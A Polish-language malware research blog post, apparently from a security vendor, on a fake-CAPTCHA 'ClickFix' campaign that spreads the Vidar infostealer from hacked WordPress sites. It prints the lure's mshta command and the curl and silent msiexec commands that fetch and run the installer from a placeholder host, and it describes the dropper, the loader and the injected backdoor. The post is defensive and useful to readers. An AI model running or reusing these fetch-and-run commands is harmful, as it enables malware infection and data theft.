Zhakowane strony internetowe rozsyłają program Vidar do Windows

| 16 marca 2026 r.
Zhakowane strony internetowe

W ostatnich latach techniki ClickFix i fałszywych CAPTCHA stały się popularnym sposobem rozpowszechniania złośliwego oprogramowania przez cyberprzestępców. Ataki te nie polegają na wykorzystywaniu luk technicznych, lecz na nakłonieniu użytkowników do samodzielnego uruchomienia złośliwych poleceń.

Nasi badacze wykryli niedawno kampanię, która ostatecznie instaluje program wykradający dane o nazwie Vidar, wykorzystując kilka różnych łańcuchów infekcji.

Jedna z metod stosowanych w tej kampanii polega na instalacji złośliwego programu instalacyjnego, który jest dostarczany za pośrednictwem fałszywych stron z testami CAPTCHA, hostowanych na zainfekowanych witrynach WordPress. Wykryliśmy szereg zainfekowanych witryn biorących udział w tej kampanii, zlokalizowanych m.in. we Włoszech, Francji, Stanach Zjednoczonych, Wielkiej Brytanii i Brazylii.

Czym jest Vidar?

Vidar to znana rodzina złośliwego oprogramowania typu infostealer, stworzona w celu wykradania poufnych danych z zainfekowanych systemów. Zazwyczaj atakuje:

  • Nazwy użytkowników i hasła zapisane w przeglądarce
  • Informacje o portfelu kryptowalutowym
  • Pliki cookie sesji i tokeny uwierzytelniające
  • Automatyczne uzupełnianie danych i zapisane informacje dotyczące płatności
  • Pliki, które mogą zawierać dane wrażliwe

Ponieważ Vidar uruchamia się w pamięci i komunikuje się ze zdalnymi serwerami poleceń, może dyskretnie gromadzić i wyciekać dane bez widocznych oznak infekcji.

Fałszywe CAPTCHA: historia bez końca

Gdy użytkownik odwiedza zainfekowaną stronę internetową, może zobaczyć ekran imitujący znaną stronę Cloudflare „Sprawdzamy, czy jesteś człowiekiem”.

Technika ta jest szeroko stosowana od 2024 roku i z biegiem czasu uległa licznym modyfikacjom, zarówno pod względem wyglądu, jak i złośliwych poleceń, które uruchamiają łańcuch infekcji.

Potwierdź, że jesteś człowiekiem
Fałszywy komunikat CAPTCHA wyświetlany użytkownikowi.

Strona nakłania odwiedzającego do skopiowania i uruchomienia złośliwego polecenia, które uruchamia łańcuch infekcji, w tym przypadku:

mshta https://{compromised website}/challenge/cf

Mshta to legalny plik Windows przeznaczony do uruchamiania aplikacji HTML firmy Microsoft (HTA). Ponieważ jest on wbudowany w Windows, cyberprzestępcy wykorzystują go od początku kampanii ClickFix.

W tym przypadku polecenie uruchamia prosty, zaszyfrowany skrypt HTA, który ostatecznie pobiera i instaluje złośliwe oprogramowanie powiązane z programem wykradającym dane o nazwie Vidar.

Program typu dropper wykorzystujący technologię HTA

Skrypt HTA stanowi etap pośredni, w ramach którego pobierany jest i uruchamiany złośliwy instalator MSI. Plik MSI to pakiet Windows , zwykle służący do instalowania oprogramowania, jednak cyberprzestępcy często wykorzystują go do rozpowszechniania złośliwego oprogramowania.

Skrypt wykonuje kilka operacji:

  • Okno zostaje zmniejszone do rozmiaru 0x0 i przesunięte poza ekran, przez co aplikacja staje się niewidoczna dla użytkownika.
  • Skrypt zostanie zakończony, jeśli document.location.href nie zaczyna się od http.
  • Ciągi znaków są dekodowane przy użyciu operacji XOR i losowego klucza.
  • Za pomocą zapytań WMI skrypt sprawdza, czy na komputerze zainstalowano programy antywirusowe.
  • Tworzy ukryte foldery robocze w losowo wybranym folderze w katalogu \AppData\Local aby umieścić tam plik MSI.
  • Ostatecznie skrypt pobiera złośliwy plik MSI ze zainfekowanej strony internetowej. Aby plik został uznany za prawidłowy, jego rozmiar musi przekraczać 100 KB. Na koniec usuwa on :Zone.Identifier alternatywny strumień danych.
Złośliwy skrypt HTA
Złośliwy skrypt HTA.

W tym przypadku złośliwy plik MSI został pobrany za pomocą następującego polecenia:

C:\Windows\System32\curl.exe" -s -L -oC:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msihttps://{compromised-website}/474a2b77/5ef46f21e2.msi

Następnie złośliwy plik MSI został uruchomiony za pomocą:

"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msi" /qn

MSI i program ładujący GoLang

Plik MSI definiuje akcję niestandardową `ConfigureNetFx` i uruchamia moduł ładujący GoLang.

Programy ładujące złośliwe oprogramowanie (zwane również dropperami lub downloaderami) są powszechnie stosowanymi narzędziami w środowisku cyberprzestępczym. Ich głównym zadaniem jest potajemne przejęcie kontroli nad systemem, a następnie dostarczenie jednego lub kilku dodatkowych ładunków złośliwego oprogramowania.

W tej kampanii moduł ładujący ostatecznie odszyfrowuje i uruchamia program Vidar służący do kradzieży danych. Plik wykonywalny nosi różne nazwy w poszczególnych analizowanych próbkach plików MSI.

Akcja niestandardowa zdefiniowana w pliku MSI.
Akcja niestandardowa zdefiniowana w pliku MSI.

Moduł ładujący Golang odszyfrowuje kod powłoki, który przeprowadza różne testy zabezpieczające przed analizą, w tym:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

Po wykonaniu kilku pośrednich czynności program ładujący odszyfrowuje i ładuje program Vidar infostealer bezpośrednio do pamięci.

Analiza stron internetowych, które padły ofiarą ataku

Złośliwy element iframe, który został wstrzyknięty do zainfekowanych stron internetowych, został wygenerowany przez domeny cdnwoopress[.]com lub woopresscdn[.]com w analizowanych przypadkach.

Złośliwy element iframe wstawiony do zaatakowanej strony internetowej.
Złośliwy element iframe wstawiony do zaatakowanej strony internetowej.

Wstrzyknięty kod pełni kilka funkcji, a polecenie wykorzystywane w ataku z wykorzystaniem fałszywego CAPTCHA pochodzi z /api/get_payload punkt końcowy.

Kod umieszczony na zaatakowanych stronach internetowych.
Kod umieszczony na zaatakowanych stronach internetowych.

Ponieważ złośliwa strona internetowa była nieprawidłowo skonfigurowana, mogliśmy przejrzeć kod zaplecza wstrzyknięty do zainfekowanych witryn WordPress.

Wprowadzony skrypt wykonuje kilka czynności:

  • Tworzy plik wp-cache-manager.php jeśli jeszcze nie istnieje, pobranie jego zawartości z punktu końcowego /api/plugin.
  • Co godzinę wysyła żądanie typu „heartbeat”, zawierające nazwę domeny, adres URL witryny, wersję WordPressa oraz status.
  • Podczas ładowania strony (template_redirect), skrypt filtruje użytkowników na podstawie głowicy User-Agent i kieruje swoją ofertę do użytkowników korzystających z Windows .
  • Wnioski /api/inject?domain=domain z serwera poleceń zdalnych. Następnie wyświetlany jest kod HTML odpowiedzi, który zastępuje standardową stronę WordPressa.
Złośliwy kod umieszczony na zaatakowanej witrynie WordPress.
Złośliwy kod umieszczony na zaatakowanej witrynie WordPress.

Jak zachować bezpieczeństwo

Ataki tego typu polegają na nakłonieniu użytkowników do samodzielnego uruchomienia poleceń, dlatego kilka prostych środków ostrożności może mieć ogromne znaczenie.

  • Zastanów się chwilę. Jeśli strona internetowa prosi Cię o wykonanie poleceń na Twoim urządzeniu lub skopiowanie i wklejenie kodu, zatrzymaj się i pomyśl, zanim zastosujesz się do instrukcji. Cyberprzestępcy często wywołują poczucie pilności za pomocą fałszywych kontroli bezpieczeństwa, liczników czasu lub ostrzeżeń, które mają skłonić Cię do działania bez zastanowienia.
  • Nigdy nie uruchamiaj poleceń pochodzących z niewiarygodnych źródeł. Prawdziwa strona internetowa nigdy nie powinna wymagać od Ciebie naciśnięcia klawiszy Win+R, otwarcia terminala ani wklejenia poleceń do programu PowerShell tylko po to, by potwierdzić, że jesteś człowiekiem. Jeśli strona prosi Cię o to, potraktuj ją jako podejrzaną.
  • Zawsze samodzielnie weryfikuj instrukcje. Jeśli strona internetowa nakazuje Ci wykonać polecenie lub podjąć działanie techniczne, przed podjęciem jakichkolwiek kroków sprawdź oficjalną dokumentację lub skontaktuj się z pomocą techniczną za pośrednictwem sprawdzonych kanałów.
  • Zachowaj ostrożność podczas kopiowania i wklejania. Niektóre ataki ukrywają złośliwe polecenia w skopiowanym tekście. Jeśli kiedykolwiek zajdzie potrzeba uruchomienia polecenia z dokumentacji, ręczne wpisanie go może pomóc zmniejszyć ryzyko uruchomienia ukrytego kodu.
  • Chroń swoje urządzenie. Dbaj o aktualizację systemu operacyjnego i przeglądarki oraz korzystaj z oprogramowania zabezpieczającego, które blokuje złośliwe strony internetowe i wykrywa złośliwe oprogramowanie służące do kradzieży danych.
  • Bądź na bieżąco. Techniki takie jak fałszywe strony CAPTCHA i ataki typu ClickFix wciąż ewoluują. Świadomość, że hakerzy mogą próbować nakłonić Cię do samodzielnego uruchomienia poleceń, pomoże Ci wykryć te oszustwa, zanim osiągną swój cel.

Wskazówka dla profesjonalistów: Darmowy Malwarebytes Browser Guard może ostrzec Cię, jeśli strona internetowa próbuje skopiować zawartość do schowka, co może pomóc w zapobieganiu tego typu atakom.

Wskaźniki kompromisu (IOC)

Domeny

  • cdnwoopress[.]com: Infrastruktura fałszywych testów CAPTCHA
  • woopresscdn[.]com: Fałszywa infrastruktura CAPTCHA
  • walwood[.]be: Fałszywa infrastruktura CAPTCHA
  • telegram[.]me/dikkh0k: Vidar C2
  • telegram[.]me/pr55ii: Vidar C2
  • steamcommunity[.]com/profiles/76561198742377525: Vidar C2
  • steamcommunity[.]com/profiles/76561198735736086: Vidar C2

Nie tylko informujemy o zagrożeniach - my je usuwamy

Zagrożenia cyberbezpieczeństwa nigdy nie powinny wykraczać poza nagłówek. Chroń swoje urządzenia przed zagrożeniami, pobierając Malwarebytes już dziś.

O autorze

Gabriele jest inżynierem ds. badań nad złośliwym oprogramowaniem, który uwielbia walkę z tym zagrożeniem. Kiedy nie zajmuje się tym, można go spotkać, jak cieszy się przyrodą, sztuką i zwierzętami.